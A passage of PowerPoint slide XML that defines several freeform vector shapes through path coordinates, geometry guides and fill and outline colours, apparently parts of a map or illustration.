                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="33"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36176" name="Freeform 309"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1558" y="2621"/>
                <a:ext cx="44" cy="33"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 42 w 44"/>
                  <a:gd name="T1" fmla="*/ 3 h 33"/>
                  <a:gd name="T2" fmla="*/ 42 w 44"/>
                  <a:gd name="T3" fmla="*/ 7 h 33"/>
                  <a:gd name="T4" fmla="*/ 43 w 44"/>
                  <a:gd name="T5" fmla="*/ 16 h 33"/>
                  <a:gd name="T6" fmla="*/ 43 w 44"/>
                  <a:gd name="T7" fmla="*/ 18 h 33"/>
                  <a:gd name="T8" fmla="*/ 40 w 44"/>
                  <a:gd name="T9" fmla="*/ 21 h 33"/>
                  <a:gd name="T10" fmla="*/ 40 w 44"/>
                  <a:gd name="T11" fmla="*/ 22 h 33"/>
                  <a:gd name="T12" fmla="*/ 44 w 44"/>
                  <a:gd name="T13" fmla="*/ 33 h 33"/>
                  <a:gd name="T14" fmla="*/ 39 w 44"/>
                  <a:gd name="T15" fmla="*/ 28 h 33"/>
                  <a:gd name="T16" fmla="*/ 36 w 44"/>
                  <a:gd name="T17" fmla="*/ 28 h 33"/>
                  <a:gd name="T18" fmla="*/ 30 w 44"/>
                  <a:gd name="T19" fmla="*/ 29 h 33"/>
                  <a:gd name="T20" fmla="*/ 24 w 44"/>
                  <a:gd name="T21" fmla="*/ 29 h 33"/>
                  <a:gd name="T22" fmla="*/ 19 w 44"/>
                  <a:gd name="T23" fmla="*/ 28 h 33"/>
                  <a:gd name="T24" fmla="*/ 15 w 44"/>
                  <a:gd name="T25" fmla="*/ 27 h 33"/>
                  <a:gd name="T26" fmla="*/ 12 w 44"/>
                  <a:gd name="T27" fmla="*/ 28 h 33"/>
                  <a:gd name="T28" fmla="*/ 9 w 44"/>
                  <a:gd name="T29" fmla="*/ 31 h 33"/>
                  <a:gd name="T30" fmla="*/ 8 w 44"/>
                  <a:gd name="T31" fmla="*/ 31 h 33"/>
                  <a:gd name="T32" fmla="*/ 1 w 44"/>
                  <a:gd name="T33" fmla="*/ 26 h 33"/>
                  <a:gd name="T34" fmla="*/ 0 w 44"/>
                  <a:gd name="T35" fmla="*/ 24 h 33"/>
                  <a:gd name="T36" fmla="*/ 0 w 44"/>
                  <a:gd name="T37" fmla="*/ 22 h 33"/>
                  <a:gd name="T38" fmla="*/ 2 w 44"/>
                  <a:gd name="T39" fmla="*/ 21 h 33"/>
                  <a:gd name="T40" fmla="*/ 9 w 44"/>
                  <a:gd name="T41" fmla="*/ 22 h 33"/>
                  <a:gd name="T42" fmla="*/ 14 w 44"/>
                  <a:gd name="T43" fmla="*/ 23 h 33"/>
                  <a:gd name="T44" fmla="*/ 22 w 44"/>
                  <a:gd name="T45" fmla="*/ 24 h 33"/>
                  <a:gd name="T46" fmla="*/ 27 w 44"/>
                  <a:gd name="T47" fmla="*/ 24 h 33"/>
                  <a:gd name="T48" fmla="*/ 31 w 44"/>
                  <a:gd name="T49" fmla="*/ 23 h 33"/>
                  <a:gd name="T50" fmla="*/ 34 w 44"/>
                  <a:gd name="T51" fmla="*/ 22 h 33"/>
                  <a:gd name="T52" fmla="*/ 33 w 44"/>
                  <a:gd name="T53" fmla="*/ 21 h 33"/>
                  <a:gd name="T54" fmla="*/ 28 w 44"/>
                  <a:gd name="T55" fmla="*/ 17 h 33"/>
                  <a:gd name="T56" fmla="*/ 27 w 44"/>
                  <a:gd name="T57" fmla="*/ 15 h 33"/>
                  <a:gd name="T58" fmla="*/ 28 w 44"/>
                  <a:gd name="T59" fmla="*/ 9 h 33"/>
                  <a:gd name="T60" fmla="*/ 27 w 44"/>
                  <a:gd name="T61" fmla="*/ 7 h 33"/>
                  <a:gd name="T62" fmla="*/ 24 w 44"/>
                  <a:gd name="T63" fmla="*/ 6 h 33"/>
                  <a:gd name="T64" fmla="*/ 17 w 44"/>
                  <a:gd name="T65" fmla="*/ 5 h 33"/>
                  <a:gd name="T66" fmla="*/ 15 w 44"/>
                  <a:gd name="T67" fmla="*/ 3 h 33"/>
                  <a:gd name="T68" fmla="*/ 15 w 44"/>
                  <a:gd name="T69" fmla="*/ 2 h 33"/>
                  <a:gd name="T70" fmla="*/ 16 w 44"/>
                  <a:gd name="T71" fmla="*/ 1 h 33"/>
                  <a:gd name="T72" fmla="*/ 18 w 44"/>
                  <a:gd name="T73" fmla="*/ 1 h 33"/>
                  <a:gd name="T74" fmla="*/ 24 w 44"/>
                  <a:gd name="T75" fmla="*/ 0 h 33"/>
                  <a:gd name="T76" fmla="*/ 29 w 44"/>
                  <a:gd name="T77" fmla="*/ 1 h 33"/>
                  <a:gd name="T78" fmla="*/ 37 w 44"/>
                  <a:gd name="T79" fmla="*/ 3 h 33"/>
                  <a:gd name="T80" fmla="*/ 41 w 44"/>
                  <a:gd name="T81" fmla="*/ 4 h 33"/>
                  <a:gd name="T82" fmla="*/ 42 w 44"/>
                  <a:gd name="T83" fmla="*/ 3 h 33"/>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44"/>
                  <a:gd name="T127" fmla="*/ 0 h 33"/>
                  <a:gd name="T128" fmla="*/ 44 w 44"/>
                  <a:gd name="T129" fmla="*/ 33 h 33"/>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44" h="33">
                    <a:moveTo>
                      <a:pt x="42" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="42" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36177" name="Freeform 310"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1558" y="2621"/>
                <a:ext cx="44" cy="33"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 42 w 44"/>
                  <a:gd name="T1" fmla="*/ 3 h 33"/>
                  <a:gd name="T2" fmla="*/ 42 w 44"/>
                  <a:gd name="T3" fmla="*/ 7 h 33"/>
                  <a:gd name="T4" fmla="*/ 43 w 44"/>
                  <a:gd name="T5" fmla="*/ 16 h 33"/>
                  <a:gd name="T6" fmla="*/ 43 w 44"/>
                  <a:gd name="T7" fmla="*/ 18 h 33"/>
                  <a:gd name="T8" fmla="*/ 40 w 44"/>
                  <a:gd name="T9" fmla="*/ 21 h 33"/>
                  <a:gd name="T10" fmla="*/ 40 w 44"/>
                  <a:gd name="T11" fmla="*/ 22 h 33"/>
                  <a:gd name="T12" fmla="*/ 44 w 44"/>
                  <a:gd name="T13" fmla="*/ 33 h 33"/>
                  <a:gd name="T14" fmla="*/ 39 w 44"/>
                  <a:gd name="T15" fmla="*/ 28 h 33"/>
                  <a:gd name="T16" fmla="*/ 36 w 44"/>
                  <a:gd name="T17" fmla="*/ 28 h 33"/>
                  <a:gd name="T18" fmla="*/ 30 w 44"/>
                  <a:gd name="T19" fmla="*/ 29 h 33"/>
                  <a:gd name="T20" fmla="*/ 24 w 44"/>
                  <a:gd name="T21" fmla="*/ 29 h 33"/>
                  <a:gd name="T22" fmla="*/ 19 w 44"/>
                  <a:gd name="T23" fmla="*/ 28 h 33"/>
                  <a:gd name="T24" fmla="*/ 15 w 44"/>
                  <a:gd name="T25" fmla="*/ 27 h 33"/>
                  <a:gd name="T26" fmla="*/ 12 w 44"/>
                  <a:gd name="T27" fmla="*/ 28 h 33"/>
                  <a:gd name="T28" fmla="*/ 9 w 44"/>
                  <a:gd name="T29" fmla="*/ 31 h 33"/>
                  <a:gd name="T30" fmla="*/ 8 w 44"/>
                  <a:gd name="T31" fmla="*/ 31 h 33"/>
                  <a:gd name="T32" fmla="*/ 1 w 44"/>
                  <a:gd name="T33" fmla="*/ 26 h 33"/>
                  <a:gd name="T34" fmla="*/ 0 w 44"/>
                  <a:gd name="T35" fmla="*/ 24 h 33"/>
                  <a:gd name="T36" fmla="*/ 0 w 44"/>
                  <a:gd name="T37" fmla="*/ 22 h 33"/>
                  <a:gd name="T38" fmla="*/ 2 w 44"/>
                  <a:gd name="T39" fmla="*/ 21 h 33"/>
                  <a:gd name="T40" fmla="*/ 9 w 44"/>
                  <a:gd name="T41" fmla="*/ 22 h 33"/>
                  <a:gd name="T42" fmla="*/ 14 w 44"/>
                  <a:gd name="T43" fmla="*/ 23 h 33"/>
                  <a:gd name="T44" fmla="*/ 22 w 44"/>
                  <a:gd name="T45" fmla="*/ 24 h 33"/>
                  <a:gd name="T46" fmla="*/ 27 w 44"/>
                  <a:gd name="T47" fmla="*/ 24 h 33"/>
                  <a:gd name="T48" fmla="*/ 31 w 44"/>
                  <a:gd name="T49" fmla="*/ 23 h 33"/>
                  <a:gd name="T50" fmla="*/ 34 w 44"/>
                  <a:gd name="T51" fmla="*/ 22 h 33"/>
                  <a:gd name="T52" fmla="*/ 33 w 44"/>
                  <a:gd name="T53" fmla="*/ 21 h 33"/>
                  <a:gd name="T54" fmla="*/ 28 w 44"/>
                  <a:gd name="T55" fmla="*/ 17 h 33"/>
                  <a:gd name="T56" fmla="*/ 27 w 44"/>
                  <a:gd name="T57" fmla="*/ 15 h 33"/>
                  <a:gd name="T58" fmla="*/ 28 w 44"/>
                  <a:gd name="T59" fmla="*/ 9 h 33"/>
                  <a:gd name="T60" fmla="*/ 27 w 44"/>
                  <a:gd name="T61" fmla="*/ 7 h 33"/>
                  <a:gd name="T62" fmla="*/ 24 w 44"/>
                  <a:gd name="T63" fmla="*/ 6 h 33"/>
                  <a:gd name="T64" fmla="*/ 17 w 44"/>
                  <a:gd name="T65" fmla="*/ 5 h 33"/>
                  <a:gd name="T66" fmla="*/ 15 w 44"/>
                  <a:gd name="T67" fmla="*/ 3 h 33"/>
                  <a:gd name="T68" fmla="*/ 15 w 44"/>
                  <a:gd name="T69" fmla="*/ 2 h 33"/>
                  <a:gd name="T70" fmla="*/ 16 w 44"/>
                  <a:gd name="T71" fmla="*/ 1 h 33"/>
                  <a:gd name="T72" fmla="*/ 18 w 44"/>
                  <a:gd name="T73" fmla="*/ 1 h 33"/>
                  <a:gd name="T74" fmla="*/ 24 w 44"/>
                  <a:gd name="T75" fmla="*/ 0 h 33"/>
                  <a:gd name="T76" fmla="*/ 29 w 44"/>
                  <a:gd name="T77" fmla="*/ 1 h 33"/>
                  <a:gd name="T78" fmla="*/ 37 w 44"/>
                  <a:gd name="T79" fmla="*/ 3 h 33"/>
                  <a:gd name="T80" fmla="*/ 41 w 44"/>
                  <a:gd name="T81" fmla="*/ 4 h 33"/>
                  <a:gd name="T82" fmla="*/ 42 w 44"/>
                  <a:gd name="T83" fmla="*/ 3 h 33"/>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44"/>
                  <a:gd name="T127" fmla="*/ 0 h 33"/>
                  <a:gd name="T128" fmla="*/ 44 w 44"/>
                  <a:gd name="T129" fmla="*/ 33 h 33"/>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44" h="33">
                    <a:moveTo>
                      <a:pt x="42" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="42" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36178" name="Freeform 311"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1348" y="2703"/>
                <a:ext cx="70" cy="69"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 70"/>
                  <a:gd name="T1" fmla="*/ 64 h 69"/>
                  <a:gd name="T2" fmla="*/ 26 w 70"/>
                  <a:gd name="T3" fmla="*/ 59 h 69"/>
                  <a:gd name="T4" fmla="*/ 19 w 70"/>
                  <a:gd name="T5" fmla="*/ 53 h 69"/>
                  <a:gd name="T6" fmla="*/ 12 w 70"/>
                  <a:gd name="T7" fmla="*/ 45 h 69"/>
                  <a:gd name="T8" fmla="*/ 6 w 70"/>
                  <a:gd name="T9" fmla="*/ 39 h 69"/>
                  <a:gd name="T10" fmla="*/ 1 w 70"/>
                  <a:gd name="T11" fmla="*/ 36 h 69"/>
                  <a:gd name="T12" fmla="*/ 0 w 70"/>
                  <a:gd name="T13" fmla="*/ 34 h 69"/>
                  <a:gd name="T14" fmla="*/ 0 w 70"/>
                  <a:gd name="T15" fmla="*/ 33 h 69"/>
                  <a:gd name="T16" fmla="*/ 4 w 70"/>
                  <a:gd name="T17" fmla="*/ 32 h 69"/>
                  <a:gd name="T18" fmla="*/ 11 w 70"/>
                  <a:gd name="T19" fmla="*/ 32 h 69"/>
                  <a:gd name="T20" fmla="*/ 13 w 70"/>
                  <a:gd name="T21" fmla="*/ 30 h 69"/>
                  <a:gd name="T22" fmla="*/ 15 w 70"/>
                  <a:gd name="T23" fmla="*/ 27 h 69"/>
                  <a:gd name="T24" fmla="*/ 15 w 70"/>
                  <a:gd name="T25" fmla="*/ 20 h 69"/>
                  <a:gd name="T26" fmla="*/ 22 w 70"/>
                  <a:gd name="T27" fmla="*/ 20 h 69"/>
                  <a:gd name="T28" fmla="*/ 25 w 70"/>
                  <a:gd name="T29" fmla="*/ 16 h 69"/>
                  <a:gd name="T30" fmla="*/ 31 w 70"/>
                  <a:gd name="T31" fmla="*/ 19 h 69"/>
                  <a:gd name="T32" fmla="*/ 39 w 70"/>
                  <a:gd name="T33" fmla="*/ 12 h 69"/>
                  <a:gd name="T34" fmla="*/ 43 w 70"/>
                  <a:gd name="T35" fmla="*/ 6 h 69"/>
                  <a:gd name="T36" fmla="*/ 45 w 70"/>
                  <a:gd name="T37" fmla="*/ 4 h 69"/>
                  <a:gd name="T38" fmla="*/ 47 w 70"/>
                  <a:gd name="T39" fmla="*/ 4 h 69"/>
                  <a:gd name="T40" fmla="*/ 49 w 70"/>
                  <a:gd name="T41" fmla="*/ 5 h 69"/>
                  <a:gd name="T42" fmla="*/ 52 w 70"/>
                  <a:gd name="T43" fmla="*/ 6 h 69"/>
                  <a:gd name="T44" fmla="*/ 54 w 70"/>
                  <a:gd name="T45" fmla="*/ 6 h 69"/>
                  <a:gd name="T46" fmla="*/ 57 w 70"/>
                  <a:gd name="T47" fmla="*/ 4 h 69"/>
                  <a:gd name="T48" fmla="*/ 68 w 70"/>
                  <a:gd name="T49" fmla="*/ 0 h 69"/>
                  <a:gd name="T50" fmla="*/ 69 w 70"/>
                  <a:gd name="T51" fmla="*/ 4 h 69"/>
                  <a:gd name="T52" fmla="*/ 70 w 70"/>
                  <a:gd name="T53" fmla="*/ 7 h 69"/>
                  <a:gd name="T54" fmla="*/ 69 w 70"/>
                  <a:gd name="T55" fmla="*/ 10 h 69"/>
                  <a:gd name="T56" fmla="*/ 68 w 70"/>
                  <a:gd name="T57" fmla="*/ 16 h 69"/>
                  <a:gd name="T58" fmla="*/ 63 w 70"/>
                  <a:gd name="T59" fmla="*/ 21 h 69"/>
                  <a:gd name="T60" fmla="*/ 63 w 70"/>
                  <a:gd name="T61" fmla="*/ 27 h 69"/>
                  <a:gd name="T62" fmla="*/ 63 w 70"/>
                  <a:gd name="T63" fmla="*/ 34 h 69"/>
                  <a:gd name="T64" fmla="*/ 61 w 70"/>
                  <a:gd name="T65" fmla="*/ 42 h 69"/>
                  <a:gd name="T66" fmla="*/ 60 w 70"/>
                  <a:gd name="T67" fmla="*/ 47 h 69"/>
                  <a:gd name="T68" fmla="*/ 59 w 70"/>
                  <a:gd name="T69" fmla="*/ 57 h 69"/>
                  <a:gd name="T70" fmla="*/ 59 w 70"/>
                  <a:gd name="T71" fmla="*/ 61 h 69"/>
                  <a:gd name="T72" fmla="*/ 61 w 70"/>
                  <a:gd name="T73" fmla="*/ 65 h 69"/>
                  <a:gd name="T74" fmla="*/ 62 w 70"/>
                  <a:gd name="T75" fmla="*/ 67 h 69"/>
                  <a:gd name="T76" fmla="*/ 60 w 70"/>
                  <a:gd name="T77" fmla="*/ 69 h 69"/>
                  <a:gd name="T78" fmla="*/ 55 w 70"/>
                  <a:gd name="T79" fmla="*/ 68 h 69"/>
                  <a:gd name="T80" fmla="*/ 53 w 70"/>
                  <a:gd name="T81" fmla="*/ 65 h 69"/>
                  <a:gd name="T82" fmla="*/ 51 w 70"/>
                  <a:gd name="T83" fmla="*/ 65 h 69"/>
                  <a:gd name="T84" fmla="*/ 48 w 70"/>
                  <a:gd name="T85" fmla="*/ 65 h 69"/>
                  <a:gd name="T86" fmla="*/ 44 w 70"/>
                  <a:gd name="T87" fmla="*/ 66 h 69"/>
                  <a:gd name="T88" fmla="*/ 32 w 70"/>
                  <a:gd name="T89" fmla="*/ 62 h 69"/>
                  <a:gd name="T90" fmla="*/ 29 w 70"/>
                  <a:gd name="T91" fmla="*/ 64 h 69"/>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70"/>
                  <a:gd name="T139" fmla="*/ 0 h 69"/>
                  <a:gd name="T140" fmla="*/ 70 w 70"/>
                  <a:gd name="T141" fmla="*/ 69 h 69"/>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70" h="69">
                    <a:moveTo>
                      <a:pt x="29" y="64"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="26" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="64"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36179" name="Freeform 312"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1348" y="2703"/>
                <a:ext cx="70" cy="69"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 70"/>
                  <a:gd name="T1" fmla="*/ 64 h 69"/>
                  <a:gd name="T2" fmla="*/ 26 w 70"/>
